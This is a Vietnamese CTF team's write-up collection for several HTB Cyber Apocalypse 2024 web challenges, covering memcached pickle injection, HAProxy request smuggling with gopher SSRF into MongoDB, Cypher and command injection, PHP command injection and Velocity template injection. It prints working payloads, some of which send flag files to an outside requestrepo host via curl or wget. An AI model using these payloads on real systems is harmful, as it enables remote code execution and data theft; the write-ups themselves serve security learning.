Challenge có 2 routes: / and /set cho phép custom lại color của website



Và 2 handlers để xử lý errors và sessions trước mọi request



Mình nhận thấy 2 routes chính không có vuln nhưng server đang mở port 11211 cho memcached



Sau khi search về memcached mình phát hiện ra có vuln serialized data injection vào Memcached

Thông qua việc tạo session, ta có thể inject nó vào memcached (python pickle) để serialize data ta truyền vào

Mình tìm một bài viết khai thác khá giống với challenge hiện tại (nhưng không thành công khi inject vào param uicolor ở route/set)

Hold up, để ý session handler, ta cũng có thể tùy chỉnh session theo ý mình(và nó được tạo trước khi vào bất kỳ routes nào)




Ta có một inject point mới (đó là session cái sẽ được khởi tạo trước uicolor)

Follow bài viết mình có set và get format command của memcached




Build local và bắt gói tin bằng wireshark, bạn sẽ thấy được giá trị của set command



Custom lại poc để exploit:

import pickle
import os

class RCE:
    def __reduce__(self):
        cmd = ('wget http://y8gdi5i3.requestrepo.com/$(cat /f*)')
        return os.system, (cmd,)

def generate_exploit():
    payload = pickle.dumps(RCE(), 0)
    payload_size = len(payload)
    cookie = b'\r\nset session:f0965c70-401b-4b6f-932c-b251165c1d5d 0 2592000 '
    cookie += str.encode(str(payload_size))
    cookie += str.encode('\r\n')
    cookie += payload
    cookie += str.encode('\r\n')
    cookie += str.encode('get session:f0965c70-401b-4b6f-932c-b251165c1d5d')
    pack = ''
    for x in list(cookie):
        if x > 64:
            pack += oct(x).replace("0o","\\")
        elif x < 8:
            pack += oct(x).replace("0o","\\00")
        else:
            pack += oct(x).replace("0o","\\0")

    return f"\"{pack}\""
print(generate_exploit())


Mình tạo pickle payload để execute os.system curl đến requestrepo với path là flag

Vì session bị limited 86 kí tự, nên mình giảm command xuống

Lưu ý rằng bạn cần build poc bằng linux hoặc ubuntu




Sau khi gửi payload injection vào session, bạn cần gửi thêm 1 request bất kì đẩy payload inject vào memcached để serialize

Và thành công lấy flag



Percetron
credit: chuong
Preface
Bài này team mình không làm được mà @kev1n  "bắt" mình viết writeup lại nên mình đọc từ writeup này của team Friendly Maltese Citizens (Top 1 giải này)

Overview
Thông tin Users được lưu trữ trong MongoDB, sau khi register và login ta vào được trang chủ:

Web sẽ chứa thông tin về các Certificate và Host (với mối quan hệ HAS_CERTIFICATE) được xậy dựng dựa trên Neo4j:


Đi vào source code: routes/generic.js chứ 2 endpoints đều nhận vào param url:

/healthcheck: tạo ra request GET tới url, tuy nhiên đã bị filter:

exports.check = (url) => {
    const parsed = new URL(url);

    if (isNaN(parseInt(parsed.port))) {
        return false;
    }

    if (parsed.port == "1337" || parsed.port == "3000") {
        return false;
    }

    if (parsed.pathname.toLowerCase().includes("healthcheck")) {
        return false;
    }

    const bad = ["localhost", "127", "0177", "000", "0x7", "0x0", "@0", "[::]", "0:0:0", "①②⑦"];
    if (bad.some(w => parsed.hostname.toLowerCase().includes(w))) {
        return false;
    }

    return true;
}


/healthcheck-dev: Thực hiện request HEAD tới url và trả về statusCode:

exports.getUrlStatusCode = (url) => {
    return new Promise((resolve, reject) => {
        const curlArgs = ["-L", "-I", "-s", "-o", "/dev/null", "-w", "%{http_code}", url];
        execFile("curl", curlArgs, (error, stdout, stderr) => {
            if (error) {
                reject(error);
                return;
            }

            const statusCode = parseInt(stdout, 10);
            console.log(statusCode)
            resolve(statusCode);
        });
    });
}

Endpoint này đã chặn bởi HaProxy với option:
backend forward_default
http-request deny if { path -i -m beg /healthcheck-dev }
server s1 127.0.0.1:3000

Ngoài ra user có permission là administrator sẽ có thêm 2 chức năng tại /panel/management/addcert và /panel/management/dl-certs Flag được tạo random trên server => cần phải RCE

Bypass HAProxy via HTTP Request Smuggling
Tại /healthcheck được filter khá chặt => khó bypass, nên ta có thể bypass proxy để từ /healthcheck-dev
HaProxy trong bài sử dụng version 2.3, theo CVE-2023-25725:


HTTP Request Smuggling là một kỹ thuật tấn công mạng nhằm khai thác sự không nhất quán trong cách xử lý HTTP request giữa các server, thường là proxy với back-end. Mục tiêu của tấn công này là "lừa" server hoặc proxy gửi một HTTP request bị tấn công (smuggled request) đến server tiếp mà không được phát hiện hoặc xử lý đúng cách, cho phép attacker thực hiện các hành động độc hại.
Tham khảo thêm tại PortSwigger.

Như vậy trong header parser với HTTP/1 trên HaProxy chấp nhận việc sử dụng header trống, điều này có thể dẫn đến việc cắt bỏ một số header sau header rỗng, có nghĩa là nó không được xem xét hoặc xử lý như thể chúng không tồn tại.
Khai thác:

Kết quả:

Như vậy là đã bypass được proxy để có thể có thể thiết lập cuộc tấn công SSRF.
Gopher SSRF
Gopher là một giao thức truyền tải tài liệu dựa trên HTTP và được thiết kế để cung cấp truy cập dễ dàng đến các tài nguyên trên Internet. Nó cho phép gửi các TCP request tùy ý với syntax: gopher://[ip]:[port]/_[url encoded payload]. Việc mongodb không sử dụng credentials để tương tác với database, ta có có thể lợi dụng gopher để thao tác với database.

Format của document:
{ "_id" : ObjectId("65f79d9bb32c0e04c4ac2c21"), "username" : "a", "password" : "$2a$10$HcA4GJoPIT.zWGNT7/IElOi4C5pWyBVGBQ78xRI.gBWOU/6eRLoE2", "permission" : "user", "__v" : 0 }

Trong MongoDB hay một số NoSQL khác, dữ liệu được truyền giữa client và server thông qua giao thức TCP/IP, dữ liệu được mã hóa và giải mã thành định dạng BSON. Server MongoDB nhận được gói tin, giải mã dữ liệu BSON và xử lý truy vấn. Tóm lại script tạo user b:b có permission là administrator:
const BSON = require("bson");
const bcrypt = require("bcryptjs");

function bufferToURLEncoded(buffer) {
    return buffer.toString('hex').toUpperCase().replace(/../g, '%$&');
}

(async () => {
    const doc = {
        insert: 'users',
        documents: [
            {
                _id: new BSON.ObjectId(),
                username: 'b',
                password: await bcrypt.hash('b', 10),
                permission: 'administrator',
            }
        ],
        ordered: true,
        '$db': 'percetron',
    };
    const data = BSON.serialize(doc);

    let beginning = Buffer.from(
        "000000000000000000000000DD0700000000000000",
        "hex"
    );
    let payload = Buffer.concat([beginning, data]);
    payload.writeUInt32LE(payload.length, 0);

    console.log(bufferToURLEncoded(payload));
})();

Tìm hiểu script rõ hơn trong bài ctf này: https://brycec.me/posts/starctf2021_writeups#oh-my-bet
Payload được tạo:

Tìm hiểu về payload này tại MongoDB Wire Protocol
Gửi request:

Kết quả sẽ có user được thêm vào database:

Login:

RCE
Sau khi vào admin, ta có thêm 2 chức năng
1. /panel/management/addcert
Enpoint này để thêm cert:
router.post("/panel/management/addcert", adminMiddleware, async (req, res) => {
    const pem = req.body.pem;
    const pubKey = req.body.pubKey;
    const privKey = req.body.privKey;

    if (!(pem && pubKey && privKey)) return res.render("error", {message: "Missing parameters"});

    const db = new Neo4jConnection();
    const certCreated = await db.addCertificate({"cert": pem, "pubKey": pubKey, "privKey": privKey});

    console.log(certCreated)
    if (!certCreated) {
        return res.render("error", {message: "Could not add certificate"});
    }

    res.redirect("/panel/management");
});

Đi vào hàm addCertificate ta thấy được input này sẽ được parsed:
const certInfo = parseCert(cert.cert);


Về x509.js có 2 hàm:

Hàm generateCert nhận các thông tin về domain, org, locality, state, country. Nó sử dụng thư viện node-forge để tạo một cặp khóa RSA, sau đó tạo cert SSL dựa trên các thông tin đã cung cấp. Cuối cùng, nó trả về public key, private key và PEM (vì vậy ta dựa vào đây để xây dựng script tạo cert)

Hàm parseCert nhận PEM và parse nó qua thư viện node-forge.



Các thông tin lưu vào biến certInfo để đưa vào query Cypher sau:
CREATE (:Certificate {
    common_name: '${certInfo.issuer.commonName}',
    file_name: '${certPath}',
    org_name: '${certInfo.issuer.organizationName}',
    locality_name: '${certInfo.issuer.localityName}',
    state_name: '${certInfo.issuer.stateOrProvinceName}',
    country_name: '${certInfo.issuer.countryName}'
});

Sau đó query được thực thi:
async runQuery(query, params = {}) {
    const result = await this.session.run(query, params);
    return result.records;
}

Như vậy việc truyền trực tiếp input và thực thi như thế này sẽ tiềm ẩn lỗ hổng Cypher Injection.
2. /panel/management/dl-certs
Chức năng này là zip các certs lại.
router.get("/panel/management/dl-certs", adminMiddleware, async (req, res) => {
    const db = new Neo4jConnection();
    const certificates = await db.getAllCertificates();

    let dirsArray = [];
    for (let i = 0; i < certificates.length; i++) {
        const cert = certificates[i];
        const filename = cert.file_name;
        const absolutePath = path.resolve(__dirname, filename);
        const fileDirectory = path.dirname(absolutePath);
        dirsArray.push(fileDirectory);
    }

    dirsArray = [...new Set(dirsArray)];
    const zipArray = [];
    let madeError = false;

    for (let i = 0; i < dirsArray.length; i++) {
        if (madeError) break;

        const dir = dirsArray[i];
        const zipName = "/tmp/" + randomHex(16) + ".zip";

        sevenzip.compress("zip", {dir: dir, destination: zipName, is64: true}, () => {}).catch(() => {
            madeError = true;
        })

        zipArray.push(zipName);  
    }

    if (madeError) {
        res.render("error", {message: "Error compressing files"});
    } else {
        res.send(zipArray);
    }
});

Dòng code zip file:
sevenzip.compress("zip", {dir: dir, destination: zipName, is64: true}, () => {}).catch(() => {
    madeError = true;
})

Đi vào thư viện sevenzip:
Thư viện này sử dụng child_process.execFile(file[, args][, options][, callback]) để thực thi command, đối với compress:

Việc có option shell : true, command sẽ được chỉ định thực thi dưới dạng shell, và trên Unix như bài này, shell mặc định là /bin/sh. Đi tiếp vào hàm buildCommandArgs:

Theo như code parameters được truyền vào là {dir: dir, destination: zipName, is64: true}, ta có thể kiểm soát được dir, từ đó thực hiện được command injection trong thư viện này.
3. Command Injection
Xem lại đoạn code tạo biến dir tức là tên thư mục chứa cert:
const filename = cert.file_name;
const absolutePath = path.resolve(__dirname, filename);
const fileDirectory = path.dirname(absolutePath);

Nó được trả về qua 2 hàm trên, vì ta có thể kiểm soát được filename dựa vào cert nên có thể custom được fileDirectory phù hợp để có thể khai thác.
Ví dụ như:

Như vậy ta có thể thực hiện command injection với filename là $(curl -d "$(cat /flag*)" http://vpcow77t.requestrepo.com)/a để đọc flag.
4. Cypher Injection (Neo4j)
Neo4j là một graph database, nó lưu trữ và truy xuất dữ liệu theo dạng graph với các nodes và relationships.
Cypher là ngôn ngữ truy vấn dữ liệu được sử dụng với Neo4j. Nó cho phép người dùng truy vấn và thao tác với database của Neo4j một cách hiệu quả.
Tham khảo thêm tại: Cypher Docs
Mặt khác filename được lấy từ cert, như đã nói trong phần trên ta sẽ khai thác cypher injection tại đây.
Payload cũng sẽ tương tự như trong SQL Injection trong câu lệnh Insert
'}), (:Certificate { file_name: '

Script tạo cert:
const fs = require("fs");
const forge = require("node-forge");

const file_path = `$(curl -d "$(cat /flag*)" http://vpcow77t.requestrepo.com)/`;

const subject = [{
    name: "countryName",
    value: '',
}, {
    name: "stateOrProvinceName",
    value: '',
}, {
    name: "localityName",
    value: '',
}, {
    name: "organizationName",
    value: '',
}, {
    name: "commonName",
    value: `'}), (:Certificate { file_name: '${file_path}`,
}];

const keys = forge.pki.rsa.generateKeyPair(2048);
const publicKey = forge.pki.publicKeyToPem(keys.publicKey);
const privateKey = forge.pki.privateKeyToPem(keys.privateKey);
const cert = forge.pki.createCertificate();

cert.publicKey = keys.publicKey;
cert.serialNumber = "01";
cert.validity.notBefore = new Date();
cert.validity.notAfter = new Date();
cert.validity.notAfter.setFullYear(cert.validity.notBefore.getFullYear() + 1);
cert.setSubject(subject);
cert.setIssuer(subject);
cert.sign(keys.privateKey);

fs.writeFileSync('cert.json', JSON.stringify({
    "privKey": privateKey,
    "pubKey": publicKey,
    "cert": forge.pki.certificateToPem(cert)
}));

cert.json thu được:

Script thêm cert và thực hiện zip file:
import json
import requests

target = 'localhost:1337'

with open('cert.json', 'r') as f:
    cert = json.load(f)
cookies = {"connect.sid": "s%3Axm6-LE0YXK2AdAEkPx5cX2wsJl9dx9W2.aejSo%2FkqyaXigEMfN0dxG2pM6sgl4kQPuHso1pe0YkY"}

requests.post(f'http://{target}/panel/management/addcert', cookies=cookies, data=cert)
requests.get(f'http://{target}/panel/management/dl-certs', cookies=cookies)

Kết quả:

Time KORP
credit: l3mnt2010
Đây là một bài command injection đơn giản với mã nguồn php.

RECON
Đề bài cho ta source code, trước tiên thì xem cơ bản chức năng đã nha :<
Vào trang ta có thể thấy trang có 2 chức năng chính là hiển thị ngày và hiển thì giờ.

Chức năng hiện thị giờ

Sever nhận param format của giờ là %H:%M:%S để hiển thị giờ. Chức năng hiển thị ngày/tháng/năm

Sever nhận param format là %Y-%m-%d để hiển thị.
DETECT
Okeee, như ta thấy thì chưa có lỗ hổng gì có thể tìm thấy ở trên cùng viewwww source nào 💯
Nhìn một cách tổng quan ta có thể thấy cấu trúc cây thư mục viết theo mô hình MVC khá phổ biến hiện nay :>

Những điểm quan trọng để giải quyết
views/index.php
class="jumbotron-heading">><span class='text-muted'>It'sspan> time ?><span class='text-muted'>.span>h1>

Ngoài những phần css và js thì chỉ có điểm này để hiển thị ngày giờ như ở trên ta phân tích.
Dockerfile
FROM debian:buster-slim

# Setup user
RUN useradd www

# Install system packeges
RUN apt-get update && apt-get install -y supervisor nginx lsb-release wget

# Add repos
RUN wget -O /etc/apt/trusted.gpg.d/php.gpg https://packages.sury.org/php/apt.gpg
RUN echo "deb https://packages.sury.org/php/ $(lsb_release -sc) main" | tee /etc/apt/sources.list.d/php.list

# Install PHP dependencies
RUN apt update && apt install -y php7.4-fpm

# Configure php-fpm and nginx
COPY config/fpm.conf /etc/php/7.4/fpm/php-fpm.conf
COPY config/supervisord.conf /etc/supervisord.conf
COPY config/nginx.conf /etc/nginx/nginx.conf

# Copy challenge files
COPY challenge /www

# Setup permissions
RUN chown -R www:www /www /var/lib/nginx

# Copy flag
COPY flag /flag

# Expose the port nginx is listening on
EXPOSE 80

# Populate database and start supervisord
CMD /usr/bin/supervisord -c /etc/supervisord.conf

Đoạn này thì chỉ cần chú ý là flag nằm trong /flag thui :>
/index.php

spl_autoload_register(function ($name){
    if (preg_match('/Controller$/', $name))
    {
        $name = "controllers/${name}";
    }
    else if (preg_match('/Model$/', $name))
    {
        $name = "models/${name}";
    }
    include_once "${name}.php";
});

$router = new Router();
$router->new('GET', '/', 'TimeController@index');

$response = $router->match();

die($response);

Mã trên sẽ map controller và model và cả TimeController@index thui nha.
Cũng tương tự với Route.php
Nói khá nhiều nhưng mà phần mấu chốt chỉ có ở đây thoiiiii

Như ta có thể thấy param format nhận được sẽ được nhận để khởi tạo một đối tượng qua class TimeModel và map kết quả tra ra ở template
models/TimeController.php

class TimeModel
{
    public function __construct($format)
    {
        $this->command = "date '+" . $format . "' 2>&1";
    }

    public function getTime()
    {
        $time = exec($this->command);
        $res  = isset($time) ? $time : '?';
        return $res;
    }
}

Trong class TimeModel sẽ khởi tạo với biến format ở trên sẽ tạo 1 command và khi gọi phương thức getTime() và exec command
Hmm, thì đây là mình có thể vận dụng để tấn công commandinjection.
ATTACK
Đầu tiên mình thử dùng curl thì sever không có, thử tiếp đến wget với payload: ';wget+--post-data+"$(cat+/flag)"+-O-+s6thtnzk.requestrepo.com'

Kết quả:

Hihi thì đây là nếu bạn muốn blind, còn nếu muốn không blind thì 👎

Flag
HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}
Labyrinth Linguist
credit: l3mnt2010

Hihi tiếp tục là một bài white-box nhưng mà với source java mà lâu rùi mình chưa đụng nên mình chưa làm và gần cuối giải thì mới để ý và xem thêm hướng giải quyết của các anh trong clb hihi:((()):
RECON
Đầu tiên thì cũng xem phần "vỏ" của trang này

Thấy cái lá xanh xanh kia là biết java spring boot rùi:<
Enter text to translate english to voxalith! nhập text để chuyển đổi qua voxalith

Khumm hiểu lắm @@
Chức năng cũng khá đơn giản:

Search xem có gì không thì cũng không có gì khác ngoài cái template khá giống bài j4JA trong tetCTF hmm,…


Okie bây giờ thì view java source thuiiiiiiii:<
DETECT
Sương sương thì cấu trúc cây thư mục như thế này:

/src/main/resources/templates/index.html

Như ta thấy thì khi mà ta submit sẽ post text lên sever để xử lí. Dockerfile
Ở chall này thì flag nằm trong /flag.txt
Main.class
// Source code is decompiled from a .class file using FernFlower decompiler.
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import org.apache.velocity.Template;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.runtime.RuntimeServices;
import org.apache.velocity.runtime.RuntimeSingleton;
import org.apache.velocity.runtime.parser.ParseException;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
@Controller
@EnableAutoConfiguration
public class Main {
   public Main() {
   }

   @RequestMapping({"/"})
   @ResponseBody
   String index(@RequestParam(required = false,name = "text") String textString) {
      if (textString == null) {
         textString = "Example text";
      }

      String template = "";

      try {
         template = readFileToString("/app/src/main/resources/templates/index.html", textString);
      } catch (IOException var9) {
         var9.printStackTrace();
      }

      RuntimeServices runtimeServices = RuntimeSingleton.getRuntimeServices();
      StringReader reader = new StringReader(template);
      Template t = new Template();
      t.setRuntimeServices(runtimeServices);

      try {
         t.setData(runtimeServices.parse(reader, "home"));
         t.initDocument();
         VelocityContext context = new VelocityContext();
         context.put("name", "World");
         StringWriter writer = new StringWriter();
         t.merge(context, writer);
         template = writer.toString();
      } catch (ParseException var8) {
         var8.printStackTrace();
      }

      return template;
   }

   public static String readFileToString(String filePath, String replacement) throws IOException {
      StringBuilder content = new StringBuilder();
      BufferedReader bufferedReader = null;

      try {
         bufferedReader = new BufferedReader(new FileReader(filePath));

         String line;
         while((line = bufferedReader.readLine()) != null) {
            line = line.replace("TEXT", replacement);
            content.append(line);
            content.append("\n");
         }
      } finally {
         if (bufferedReader != null) {
            try {
               bufferedReader.close();
            } catch (IOException var10) {
               var10.printStackTrace();
            }
         }

      }

      return content.toString();
   }

   public static void main(String[] args) throws Exception {
      System.getProperties().put("server.port", 1337);
      SpringApplication.run(Main.class, args);
   }
}

Decompile sẽ thấy được source kia, thì chall này chỉ có source này chính thui
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import org.apache.velocity.Template;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.runtime.RuntimeServices;
import org.apache.velocity.runtime.RuntimeSingleton;
import org.apache.velocity.runtime.parser.ParseException;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;

Ta có thể xem version và library của các notification và các hàm sử dụng trong Main.
Cần chú ý là sever sử dụng thư viện apache.velocity version 1.7

Quay lại phần phân tích source như ta đã thấy ở trên thì chall này chỉ có 1 route duy nhất là / thui
 @RequestMapping({"/"})
   @ResponseBody
   String index(@RequestParam(required = false,name = "text") String textString) {
      if (textString == null) {
         textString = "Example text";
      }

      String template = "";

      try {
         template = readFileToString("/app/src/main/resources/templates/index.html", textString);
      } catch (IOException var9) {
         var9.printStackTrace();
      }

      RuntimeServices runtimeServices = RuntimeSingleton.getRuntimeServices();
      StringReader reader = new StringReader(template);
      Template t = new Template();
      t.setRuntimeServices(runtimeServices);

      try {
         t.setData(runtimeServices.parse(reader, "home"));
         t.initDocument();
         VelocityContext context = new VelocityContext();
         context.put("name", "World");
         StringWriter writer = new StringWriter();
         t.merge(context, writer);
         template = writer.toString();
      } catch (ParseException var8) {
         var8.printStackTrace();
      }

      return template;
   }

Đầu tiên nhận giá trị text được post lên từ index.html template nếu mà textString là null thì gán textString=Example text
Sau đó khởi tạo String template với chuỗi rỗng.
Sau đó try catch để gán template bằng nội dung template + hiển thị textString
Tiếp tục RuntimeServices runtimeServices = RuntimeSingleton.getRuntimeServices();
Tạo một biến runtimeServices và từ đó ta có thể sử dụng các phương thức và thuộc tính của RuntimeSingleton.getRuntimeServices();
StringReader reader = new StringReader(template);: Tạo một đối tượng StringReader từ một chuỗi template. StringReader là một lớp trong Java cho phép đọc từ chuỗi này.
Template t = new Template();: Tạo một thể hiện mới của lớp Template. Đối tượng này sẽ đại diện cho một template, mà sau đó có thể được sử dụng để xử lý và sinh ra dữ liệu đầu ra dựa trên dữ liệu đầu vào được cung cấp.
t.setRuntimeServices(runtimeServices);: Thiết lập RuntimeServices cho đối tượng template t đã tạo. Điều này đảm bảo rằng template có thể sử dụng các dịch vụ và tính năng được cung cấp bởi RuntimeServices, chẳng hạn như các hàm và biến được định nghĩa trong quá trình xử lý template.
Tiếp nữa là sử dụng try-catch 🅰️
try {
         t.setData(runtimeServices.parse(reader, "home"));
         t.initDocument();
         VelocityContext context = new VelocityContext();
         context.put("name", "World");
         StringWriter writer = new StringWriter();
         t.merge(context, writer);
         template = writer.toString();
      } catch (ParseException var8) {
         var8.printStackTrace();
      }

GPT Một tí :>:

t.setData(runtimeServices.parse(reader, "home")): Đọc và phân tích nội dung của reader (đã được tạo từ chuỗi template) bằng cách sử dụng runtimeServices. Kết quả được đặt vào đối tượng t để sử dụng cho việc tạo ra dữ liệu đầu ra.
t.initDocument(): Khởi tạo tài liệu của template. Điều này chuẩn bị template để merge với dữ liệu và sinh ra dữ liệu đầu ra.
VelocityContext context = new VelocityContext(): Tạo một đối tượng VelocityContext, một đối tượng lưu trữ các cặp khóa-giá trị được sử dụng trong quá trình merge.
context.put("name", "World"): Thêm một cặp khóa-giá trị vào VelocityContext. Trong ví dụ này, "name" là khóa và "World" là giá trị tương ứng.
StringWriter writer = new StringWriter(): Tạo một đối tượng StringWriter để lưu kết quả của việc merge template.
t.merge(context, writer): Merge template với dữ liệu được cung cấp từ VelocityContext vào StringWriter. Kết quả được lưu trong StringWriter.
template = writer.toString(): Chuyển nội dung của StringWriter thành một chuỗi và gán vào biến template.
Để ý đoạn này : VelocityContext context = new VelocityContext();


Chưa làm thì cũng đoán chắc đây là SSTI rùi:<
Sau khi hỏi mấy anh thì mình tìm được bài nì:
https://www.linkedin.com/pulse/apache-velocity-server-side-template-injection-marjan-sterjev/
Có cả POC lun:
Mình sẽ dựa trên blog này để phân tích:
Apache Velocity Server-Side Template Injection
Như search ở trên thì đây là một template để hiển thị nội dung của java từ apache cũng giống như bao thư viện khác
import java.io.StringWriter;
import org.apache.velocity.Template;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;

public class VelocityTest {

    public static void main(String[] args) throws Throwable {

        VelocityEngine velocityEngine = new VelocityEngine();
        velocityEngine.init();
        Template t = velocityEngine.getTemplate("template.vm");
        VelocityContext context = new VelocityContext();
        context.put("name", "l3mnt2010");
        StringWriter writer = new StringWriter();
        t.merge(context, writer);
        System.out.println(writer);

    }

}

Ta có thể thấy source khá tương tự ở trên nêu thì khi mình nhập vào thì sẽ hiển thị nội dung name + l3mnt2010:
Đây là source
Và cũng giống như những template khác thì velocity cũng có thể truy cập được với các cú pháp của nó và ta chú ý đến #set($message = "l3mnt2010")
Thì biến $message được gán giá trị là l3mnt2010, nếu từ riêng lẻ thì khó có thể thực thi mã với os trên template này nên ta sử dụng kết hợp với các lớp hàm hàm khởi tạo của java luôn
POC:
#set($s="")
#set($stringClass=$s.getClass())
#set($stringBuilderClass=$stringClass.forName("java.lang.StringBuilder"))
#set($inputStreamClass=$stringClass.forName("java.io.InputStream"))
#set($readerClass=$stringClass.forName("java.io.Reader"))
#set($inputStreamReaderClass=$stringClass.forName("java.io.InputStreamReader"))
#set($bufferedReaderClass=$stringClass.forName("java.io.BufferedReader"))
#set($collectorsClass=$stringClass.forName("java.util.stream.Collectors"))
#set($systemClass=$stringClass.forName("java.lang.System"))
#set($stringBuilderConstructor=$stringBuilderClass.getConstructor())
#set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass))
#set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass))

#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())
#set($process=$runtime.exec("ls /"))
#set($null=$process.waitFor() )

#set($inputStream=$process.getInputStream())
#set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream))
#set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader))
#set($stringBuilder=$stringBuilderConstructor.newInstance())

#set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator())))

$output

Ở đây ta lợi dụng hàm thực thi từ java.lang.Runtime để chạy os command và kết quả nhận được

Và lụm flag thui:

Flag
HTB{f13ry_t3mpl4t35_fr0m_th3_d3pth5!!}
Apexsurvive
credit: kev1n
Dạo này mình khá là hay viết wu các ctf challenge (chắc chắn không phải là do ngày trước mình lười), nó dường như đã tạo cho mình thói quen hàng tuần mình sẽ wu lại những challenge mình chơi và mình thấy hay và học được nhiều thứ từ nó. Câu lạc bộ mình tuần này có tham gia giải HTB - Cyber Apocalypse 2024, phải công nhận đây là một giải dài hơi và mình đã tốn tương đối thời gian cho các challenge web của giải này (cụ thể là 4 ngày) nhưng vẫn không thể solve được hết web challenge của giải, bản thân mình còn phải học hỏi rất nhiều nữa mới có thể hiểu và solve được dạng bài web cuối cùng nếu lần sau còn gặp lại. Giải đã kết thúc và cũng nhờ sự cố gắng, try hard của các anh em trong câu lạc bộ đến từ mọi mảng mà clb mình cũng đạt được thứ hạng mình nghĩ là khá cao.
Lan man vậy cũng đủ rồi, sau đây sẽ là quá trình mình và các teamates trong KCSC đi giải các challenge web HTB, cũng như cách hiểu của mình về web chall đó. Let's go!!

Preface
Đây là một chall white box nên mình download source về rồi dựng local khai thác cho nó tiện theo dõi :")))
Sau khi dựng xong thì mình cũng phải khá choáng vì dockerfile của bài này những 70 dòng, nên mình tò mò đọc để nắm trước cần phải làm gì ở chall này
# Setup flag
COPY flag.txt /root/flag
RUN chmod 600 /root/flag

# Setup readflag
COPY config/readflag.c /
RUN gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c

Docker như này là mình phải RCE để lấy flag rùi Chall có 2 service, 1 service web chính chạy python, và service email chạy js (và bot), nên mình nghĩ chắc sẽ có cả lỗ hổng client side và server side trong challenge này
Verify email token
Vào chall thì mình được 'hướng dẫn' đăng kí với tên test@email.htb và để nhận được token email verify, nên cũng nhanh nhảu register và nhận được token ở endpoint /email khi đã vào account settings và chọn verify:

Sau khi verify mình thấy có chức năng report và tham số truyền vào là ID của sản phẩm có tại /challenge/home(nghe mùi xss quá)
Đi vào đọc source, mình thấy có endpoint /eternal khá hay khi cho phép redirect đến endpoint mình control:
@web.route('/external')
def external():
    url = request.args.get('url', '')

    if not url:
        return redirect('/')

    return redirect(url)

Với việc cookie được set samesite: strict, mình nghĩ đến việc bypass Samesite Strict bằng redirect nên đã ngồi với thằng này cả buổi nhưng không có kết quả 😢
Mò mẫm source code
Sau khi tốn kha khá thời gian với thằng endpoint này mà không được kết quả gì, mình quyết định tạm thời bỏ qua và hướng đến các chức năng khác, có 2 chức năng đáng chú ý khi mình có thể lên được admin, đó là thêm sản phẩm/addItem và thêm contract/addContract.

Chức năng thêm sản phẩm có thể được sử dụng khi mình thỏa mãn isInternal (cụ thể là thuộc tính isInternal của user trong db là true) thì có thể sử dụng, addItem dùng để thêm một sản phẩm mới vào shop. Tuy nhiên thì các input cũng đã được sanitize chỉ cho phép nhập vào các tag và attribute nhất định được quy định trong middlewares.py

@api.route('/addItem', methods=['POST'])
@isAuthenticated
@isVerified
@isInternal
@antiCSRF
@sanitizeInput
def addItem(decodedToken):
    name = request.form.get('name', '')
    price = request.form.get('price', '')
    description = request.form.get('description', '')
    image = request.form.get('imageURL', '')
    note = request.form.get('note', '')
    seller = request.form.get('seller', '')

    if any(value == '' for value in [name, price, description, image, note, seller]):
        return response('All fields are required!'), 401

    newProduct = addProduct(name, image, description, price, seller, note)

    if newProduct:
        return response('Product Added')

    return response('Something went wrong!')


Chức năng mình muốn nói đến thêm contract, khi upload 1 file lên, server lưu nội dung vào /tmp/temporaryUpload rồi mới check nội dung của file đó ở hàm checkPDF sử dụng PdfReader mode strict (khó cứu ca này). Nếu check thành công sẽ nối /app/application, contracts và file name bằng os.path.join để tạo thành file path hoàn chỉnh. Hàm path.join dính path traversal nặng và đây là lỗi mình cần khai thác để exploit path traversal upload file to RCE.


@api.route('/addContract', methods=['POST'])
@isAuthenticated
@isVerified
@isInternal
@isAdmin
@antiCSRF
@sanitizeInput
def addContract(decodedToken):
    name = request.form.get('name', '')

    uploadedFile = request.files['file']

    if not uploadedFile or not name:
        return response('All files required!')

    if uploadedFile.filename == '':
        return response('Invalid file!')

    uploadedFile.save('/tmp/temporaryUpload')

    isValidPDF = checkPDF()

    if isValidPDF:
        try:
            filePath = os.path.join(current_app.root_path, 'contracts', uploadedFile.filename)
            with open(filePath, 'wb') as wf:
                with open('/tmp/temporaryUpload', 'rb') as fr:
                    wf.write(fr.read())

            return response('Contract Added')
        except Exception as e:
            print(e, file=sys.stdout)
            return response('Something went wrong!')

    return response('Invalid PDF! what are you trying to do?')


Buồn ở chỗ chức năng này không dễ có tí nào vì phải là admin thì mới sử dụng được, bài toán lúc này lại quay về việc làm thế nào để lên được admin

Tiếp tục đọc source, mình ngốn khoảng 1 buổi tiếp theo để nghĩ cách bypass admin nhưng chẳng có cách nào khả thi, cũng may là cuộc thi kéo dài nhiều ngày nên mình có nhiều thời gian suy nghĩ hơn. Lúc này mình đã chịu và không tìm được cách leo lên admin, nhưng lại biết được vuln sau khi lên admin (aizzz chíc tịc). Nhận thấy chức năng report sẽ lấy credential của admin và gửi đi nên mình sử dụng chúng đăng nhập vào admin exploit lỗi upload file, các teammates sẽ lo vụ leo lên admin 😆
